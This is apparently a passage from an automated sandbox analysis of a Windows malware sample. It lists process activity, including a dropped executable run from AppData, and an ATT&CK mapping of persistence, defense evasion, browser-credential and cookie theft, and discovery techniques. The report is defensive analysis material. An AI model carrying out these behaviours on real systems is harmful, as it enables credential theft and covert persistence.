  - Suspicious behavior: EnumeratesProcesses
  PID:1844
- - C:\Windows\system32\PING.EXE
    "C:\Windows\system32\PING.EXE" 127.1.10.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:7128

C:\Users\Admin\AppData\Roaming\X91lnt.exe
C:\Users\Admin\AppData\Roaming\X91lnt.exe
1⤵
- Executes dropped EXE
PID:7156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6300 -ip 6300
1⤵
PID:5340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion